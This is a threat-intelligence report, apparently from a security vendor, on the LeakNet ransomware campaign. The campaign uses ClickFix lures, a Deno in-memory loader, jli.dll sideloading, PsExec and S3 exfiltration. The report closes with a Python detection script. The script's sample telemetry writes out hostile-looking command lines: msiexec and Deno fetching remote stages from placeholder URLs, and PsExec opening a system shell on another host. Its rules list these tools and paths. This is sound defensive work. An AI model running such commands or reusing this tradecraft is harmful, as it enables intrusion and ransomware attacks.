LeakNet Ransomware Exploits ClickFix via Compromised Websites to Attack Windows Environments with Deno In-Memory Loader

Executive Summary
The emergence of the LeakNet ransomware campaign marks a significant escalation in the sophistication of ransomware operations targeting enterprise environments. This campaign leverages the ClickFix social engineering technique to gain initial access via compromised legitimate websites, coercing users into executing malicious scripts under the guise of security verifications. The attackers then deploy a custom in-memory loader built on the Deno JavaScript/TypeScript runtime, a legitimate and signed binary, to execute payloads directly in memory and evade traditional endpoint detection mechanisms. The attack chain is characterized by its abuse of trusted software, advanced in-memory execution, and stealthy post-exploitation tactics, including credential harvesting, lateral movement, and data exfiltration to cloud storage. This report provides a comprehensive technical analysis of the campaign, observed tactics, techniques, and procedures (TTPs), exploitation in the wild, victimology, and actionable mitigation strategies.
Threat Actor Profile
The LeakNet ransomware group is an emerging threat actor with a rapidly evolving toolkit and a demonstrated ability to integrate novel techniques into its operations. While direct attribution to a known advanced persistent threat (APT) group remains unconfirmed, the TTPs observed in this campaign overlap with those of established ransomware collectives such as Termite and Interlock. The group relies heavily on legitimate software and commodity cloud infrastructure, which blends its activity into normal enterprise traffic and complicates both detection and attribution. Public reporting from sources such as ReliaQuest, BleepingComputer, and News4Hackers indicates that LeakNet is opportunistic, targeting a broad range of corporate networks globally, with a particular focus on organizations where user interaction with web-based resources is frequent and security awareness may be lacking.
Technical Analysis of Malware/TTPs
The LeakNet campaign employs a multi-stage attack chain designed for stealth, persistence, and maximum impact.
Initial access is achieved through the ClickFix technique: users visiting compromised legitimate websites are shown fake security prompts, such as bogus Cloudflare Turnstile or CAPTCHA verifications, that instruct them to copy a command into the Windows Run dialog or a terminal and execute it themselves. The command, often built around msiexec, downloads and runs a signed script. The scripts, typically named Romeo*.ps1 (PowerShell) or Juliet*.vbs (VBScript), are crafted to appear benign and to evade endpoint security controls. Because the victim performs the execution, no software vulnerability is needed at this stage.
The script then applies a Bring Your Own Runtime (BYOR) tactic: it drops the Deno runtime, a legitimate, code-signed JavaScript/TypeScript binary that is rarely flagged by security products because of its widespread use in development environments. Deno's permission model offers no protection here: the runtime restricts network, file, environment and subprocess access only when the invoking command withholds those permissions, and in this chain the attacker controls the command line. The malicious payload, often base64-encoded, is executed directly in memory by Deno, leaving minimal forensic artifacts on disk and defeating detection that depends on scanning files.
The in-memory loader fingerprints the host by collecting system information such as username, hostname, available memory, and OS version. It generates a unique victim identifier and establishes a persistent polling loop to a command-and-control (C2) server. The loader retrieves second-stage payloads, which are also executed in memory, further reducing the attack’s footprint.
Post-exploitation activities include DLL sideloading (notably via a malicious jli.dll in C:\ProgramData\USOShared; jli.dll is a library the Java launcher loads, so a legitimate Java executable is the host for the malicious copy), credential discovery using built-in tools such as klist to enumerate cached Kerberos tickets, lateral movement through PsExec, and data exfiltration to Amazon S3 buckets. The campaign's C2 infrastructure leverages both custom domains (e.g., okobojirent[.]com, mshealthmetrics[.]com) and cloud storage, complicating detection and takedown efforts.
Exploitation in the Wild
The LeakNet campaign has been observed in the wild since March 2026, with incidents reported across multiple sectors and geographies. The attack vector is primarily web-based, exploiting compromised legitimate websites to deliver the initial payload via ClickFix lures. There is no evidence of exploitation of specific software vulnerabilities or CVEs; instead, the campaign relies on user interaction and abuse of legitimate binaries. The use of newly registered domains and cloud infrastructure for C2 and exfiltration has been documented by multiple threat intelligence sources, including ReliaQuest and BleepingComputer. The campaign’s reliance on social engineering and trusted software makes it particularly challenging to detect and mitigate using traditional security controls.
Victimology and Targeting
LeakNet targets a broad spectrum of corporate networks, with no specific industry verticals singled out in public reporting. The campaign is global in scope, with confirmed activity in regions including India and North America. Victims are typically organizations where employees are likely to interact with web-based resources and may be susceptible to social engineering tactics. The attack chain's dependence on user execution of scripts underscores the importance of security awareness and robust endpoint controls. There is no evidence to suggest targeting of specific software products or versions; rather, any Windows environment where users can be tricked into executing arbitrary scripts is at risk. Because the chain brings its own Deno runtime for in-memory execution and abuses a Java component (jli.dll) for DLL sideloading, it does not depend on particular software already being present on the victim, which further broadens the potential victim pool.
Mitigation and Countermeasures
Organizations should implement a multi-layered defense strategy to mitigate the risks posed by the LeakNet campaign. Monitoring for Deno runtime execution on endpoints where it is not expected is critical; because the binary is legitimately signed, detection has to key on where, by whom and with what parent process it runs rather than on the file's reputation. Alerting on the execution of PowerShell or VBScript files with the campaign's naming convention, Romeo*.ps1 and Juliet*.vbs, is equally important. Network monitoring should be configured to detect unexpected outbound connections to Amazon S3 and other cloud storage providers, as well as to known malicious domains and IP addresses associated with the campaign's C2 infrastructure.
Endpoint detection and response (EDR) solutions should be tuned to identify DLL sideloading in non-standard directories, particularly involving jli.dll in C:\ProgramData\USOShared. Usage of PsExec for lateral movement should be restricted to authorized administrators and closely audited. Security awareness training should emphasize the dangers of executing unsolicited scripts or commands, even when presented as legitimate security checks.
Additional countermeasures include blocking or alerting on connections to newly registered domains at the DNS or web-proxy layer, implementing application allowlisting (for example WDAC or AppLocker) to prevent unauthorized execution of scripting engines and runtimes, and enforcing the principle of least privilege on user accounts. Because Deno and the Java launcher are signed by legitimate publishers, a publisher-based allowlist that trusts them by signature will not stop this chain; they should be explicitly denied on endpoints that have no business need for them. Regular review of cloud storage access logs and anomaly detection for data exfiltration events are also recommended.
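The endpoint monitoring described above, expressed as hunting rules over Sysmon-style process-creation and image-load events. This is an added example, not code from the original report or from any of the cited sources. The script-name patterns, the jli.dll path and the PsExec usage come from the report; the event fields, the sample telemetry, the placeholder URLs (example.invalid) and the DENO_ALLOWED_HOSTS allowlist are constructed for illustration.

```python
"""Hunting rules for the LeakNet/ClickFix tradecraft described in this report.

Added example, not code from the report or the cited sources. Events are
Sysmon-style process-creation (EID 1) and image-load (EID 7) records reduced
to a few fields; the sample events and DENO_ALLOWED_HOSTS are constructed.
"""
import fnmatch
import re
from dataclasses import dataclass


@dataclass
class Event:
    event_type: str        # "process" (Sysmon EID 1) or "image_load" (Sysmon EID 7)
    image: str             # full path of the new process, or of the loaded DLL
    host: str
    command_line: str = ""
    parent_image: str = ""


# Indicators taken from the report.
SCRIPT_NAME_PATTERNS = ("romeo*.ps1", "juliet*.vbs")
SIDELOAD_DLL = r"c:\programdata\usoshared\jli.dll"
PSEXEC_IMAGES = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}
# Installers/interpreters a ClickFix lure has the victim launch from the Run
# dialog; msiexec is the one the report names.
RUN_DIALOG_STAGERS = {"msiexec.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                      "mshta.exe", "wscript.exe", "cscript.exe"}
# Hypothetical allowlist: hosts where developers legitimately run Deno.
DENO_ALLOWED_HOSTS = {"dev-ws-01", "dev-ws-02"}

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Deno grants network, file, env and subprocess access only when asked; a
# loader that drives the runtime asks for everything.
DENO_PERMISSION_RE = re.compile(r"(?:^|\s)(?:-A|--allow-all|--allow-net|--allow-run|"
                                r"--allow-read|--allow-write)(?=\s|=|$)")


def _basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: Event) -> list[str]:
    """Return the names of every rule the event triggers (empty list if none)."""
    hits: list[str] = []
    if ev.event_type == "process":
        img, parent = _basename(ev.image), _basename(ev.parent_image)
        # 1. ClickFix: explorer.exe (the Run dialog) spawning a stager that pulls from a URL.
        if parent == "explorer.exe" and img in RUN_DIALOG_STAGERS and URL_RE.search(ev.command_line):
            hits.append("clickfix_run_dialog_download")
        # 2. The campaign's script naming convention anywhere on the command line.
        for token in re.split(r"[\s\"']+", ev.command_line):
            if any(fnmatch.fnmatch(_basename(token), p) for p in SCRIPT_NAME_PATTERNS):
                hits.append("leaknet_script_name")
                break
        # 3. Deno outside the hosts where it is expected, and Deno asked for broad permissions.
        if img == "deno.exe":
            if ev.host.lower() not in DENO_ALLOWED_HOSTS:
                hits.append("unexpected_deno_runtime")
            if DENO_PERMISSION_RE.search(ev.command_line):
                hits.append("deno_broad_permissions")
        # 4. PsExec client or its service binary.
        if img in PSEXEC_IMAGES:
            hits.append("psexec_lateral_movement")
    elif ev.event_type == "image_load":
        # 5. The sideloaded jli.dll at the exact path the report names.
        if ev.image.replace("/", "\\").lower() == SIDELOAD_DLL:
            hits.append("jli_dll_sideload_usoshared")
    return hits


def scan(events: list[Event]) -> list[tuple[str, str, list[str]]]:
    """(host, image name, rule hits) for every event that fires at least one rule."""
    return [(ev.host, _basename(ev.image), hits)
            for ev in events if (hits := check_event(ev))]


# Constructed sample telemetry; example.invalid is a placeholder, not an IOC.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\msiexec.exe", "fin-ws-17",
          "msiexec /i https://example.invalid/verify.msi /qn", r"C:\Windows\explorer.exe"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "fin-ws-17",
          r'powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\Romeo4.ps1"',
          r"C:\Windows\System32\wscript.exe"),
    Event("process", r"C:\Users\Public\deno.exe", "fin-ws-17",
          "deno run -A https://example.invalid/stage2.ts",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    Event("process", r"C:\Users\dev\.deno\bin\deno.exe", "dev-ws-01", "deno test",
          r"C:\Windows\System32\cmd.exe"),
    Event("image_load", r"C:\ProgramData\USOShared\jli.dll", "fin-ws-17"),
    Event("process", r"C:\Users\Public\PsExec.exe", "fin-ws-17",
          r"PsExec.exe \\FILESRV-02 -s cmd.exe", r"C:\Windows\System32\cmd.exe"),
    Event("process", r"C:\Program Files\Google\Chrome\Application\chrome.exe", "fin-ws-17",
          "chrome.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for host, image, hits in scan(SAMPLE_EVENTS):
        print(f"{host}: {image} -> {', '.join(hits)}")
```

Running the block over the constructed events fires five of the seven: the Run-dialog msiexec download, the Romeo*.ps1 launch, the Deno run with -A on a non-developer host (two rules), the jli.dll load from USOShared, and the PsExec invocation; the developer's plain `deno test` and the browser launch stay silent. In production the same rules map onto a SIEM query over Sysmon EID 1 and EID 7, with the allowlist replaced by your asset inventory.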
References
ReliaQuest: Casting a Wider Net: ClickFix, Deno, and LeakNet’s Scaling Threat – https://reliaquest.com/blog/threat-spotlight-casting-a-wider-net-clickfix-deno-and-leaknets-scaling-threat/
BleepingComputer: LeakNet ransomware uses ClickFix, Deno runtime in stealthy attacks – https://www.bleepingcomputer.com/news/security/leaknet-ransomware-uses-clickfix-and-deno-runtime-for-stealthy-attacks/
News4Hackers: LeakNet Ransomware Utilizes ClickFix and Deno Runtime for Stealthy Attacks – https://www.news4hackers.com/leaknet-ransomware-utilizes-clickfix-and-deno-runtime-for-stealthy-attacks/
Reddit: LeakNet Ransomware Adopts ClickFix via Hacked Sites, Deploys Deno Loader – https://www.reddit.com/r/pwnhub/comments/1rwkgvp/leaknet_ransomware_adopts_clickfix_via_hacked/
MITRE ATT&CK: Command and Scripting Interpreter – https://attack.mitre.org/techniques/T1059/
MITRE ATT&CK: DLL Sideloading – https://attack.mitre.org/techniques/T1574/001/
MITRE ATT&CK: Exfiltration Over Web Service: Exfiltration to Cloud Storage – https://attack.mitre.org/techniques/T1567/002/
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to continuously monitor, assess, and mitigate cyber risks across their extended supply chain. Our advanced analytics and threat intelligence capabilities empower security teams to proactively identify emerging threats and respond with agility. For more information or to discuss how Rescana can support your organization’s cybersecurity posture, we are happy to answer questions at ops@rescana.com.